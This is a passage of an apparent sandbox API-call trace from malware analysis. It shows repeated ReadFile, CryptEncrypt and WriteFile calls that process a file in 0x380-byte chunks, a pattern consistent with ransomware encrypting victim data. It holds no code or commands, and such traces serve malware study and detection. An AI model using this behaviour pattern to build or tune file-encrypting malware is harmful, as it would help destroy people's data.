pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.643] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.643] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.644] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.645] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.646] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.647] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.648] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.649] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.650] CryptEncrypt (in: hKey=0x2fc388, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e1d0*, 